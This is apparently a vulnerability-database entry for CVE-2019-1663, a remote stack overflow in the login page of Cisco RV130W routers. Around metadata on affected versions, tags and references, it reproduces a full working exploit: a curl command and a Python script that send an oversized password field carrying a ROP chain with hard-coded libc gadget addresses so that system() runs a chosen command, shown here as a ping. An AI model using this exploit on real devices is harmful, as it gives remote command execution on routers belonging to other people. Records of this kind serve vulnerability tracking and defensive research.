ID

VAR-E-201904-0029


CVE

cve_id:CVE-2019-1663

Trust: 2.5

sources: PACKETSTORM: 152507 // PACKETSTORM: 154310 // PACKETSTORM: 153163 // EXPLOIT-DB: 46961

EDB ID

46961


TITLE

Cisco RV130W 1.0.3.44 - Remote Stack Overflow - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 46961

DESCRIPTION

Cisco RV130W 1.0.3.44 - Remote Stack Overflow. CVE-2019-1663 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 46961

AFFECTED PRODUCTS

vendor:ciscomodel:rv130wscope:eqversion:1.0.3.44

Trust: 1.6

vendor:ciscomodel:rv130w routers management interface remotescope: - version: -

Trust: 0.5

vendor:ciscomodel:rv110w rv130 rv215w remotescope:eqversion://

Trust: 0.5

vendor:ciscomodel:rv130w remotescope:eqversion:1.0.3.44

Trust: 0.5

sources: PACKETSTORM: 152507 // PACKETSTORM: 154310 // PACKETSTORM: 153163 // EXPLOIT-DB: 46961 // EDBNET: 101568

EXPLOIT

#!/usr/bin/python
# Exploit Title: Cisco RV130W Remote Stack Overflow
# Google Dork: n/a
# Date: Advisory Published: Feb 2019
# Exploit Author: @0x00string
# Vendor Homepage: cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
# Version: 1.0.3.44 and prior
# Tested on: 1.0.3.44
# CVE : CVE-2019-1663
#
# 0x357fc000 - libc base addr
# 0x35849144 - system() addr
#
# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc};
# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
#
# gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text
# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
#
# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'

#!/usr/bin/python
import requests

def banner():
print '''
@0x00string
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
'''

def main():
banner()
command = "ping 192.168.1.100\x00"
print ("Sending exploit to execute [" + command + "]\n")
rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"
payload = ("Z" * 446) + rop + command
url = "https://192.168.1.100:443/login.cgi"
data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}
r = requests.post(url, payload=data)

if __name__ == "__main__":
main()

Trust: 1.0

sources: EXPLOIT-DB: 46961

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 46961

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 46961

TYPE

Remote Stack Overflow

Trust: 1.6

sources: EXPLOIT-DB: 46961 // EDBNET: 101568

TAGS

tag:exploit

Trust: 1.5

tag:remote

Trust: 1.5

tag:web

Trust: 1.0

tag:arbitrary

Trust: 1.0

tag:overflow

Trust: 0.5

sources: PACKETSTORM: 152507 // PACKETSTORM: 154310 // PACKETSTORM: 153163

CREDITS

@0x00string

Trust: 0.6

sources: EXPLOIT-DB: 46961

EXTERNAL IDS

db:NVDid:CVE-2019-1663

Trust: 3.1

db:EXPLOIT-DBid:46961

Trust: 1.6

db:EDBNETid:101568

Trust: 0.6

db:PACKETSTORMid:152507

Trust: 0.5

db:PACKETSTORMid:154310

Trust: 0.5

db:PACKETSTORMid:153163

Trust: 0.5

sources: PACKETSTORM: 152507 // PACKETSTORM: 154310 // PACKETSTORM: 153163 // EXPLOIT-DB: 46961 // EDBNET: 101568

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2019-1663

Trust: 2.5

url:https://www.exploit-db.com/exploits/46961/

Trust: 0.6

sources: PACKETSTORM: 152507 // PACKETSTORM: 154310 // PACKETSTORM: 153163 // EXPLOIT-DB: 46961 // EDBNET: 101568

SOURCES

db:PACKETSTORMid:152507
db:PACKETSTORMid:154310
db:PACKETSTORMid:153163
db:EXPLOIT-DBid:46961
db:EDBNETid:101568

LAST UPDATE DATE

2022-07-27T09:26:51.978000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:152507date:2019-04-14T21:28:54
db:PACKETSTORMid:154310date:2019-09-02T18:02:22
db:PACKETSTORMid:153163date:2019-06-04T04:44:44
db:EXPLOIT-DBid:46961date:2019-06-04T00:00:00
db:EDBNETid:101568date:2019-06-04T00:00:00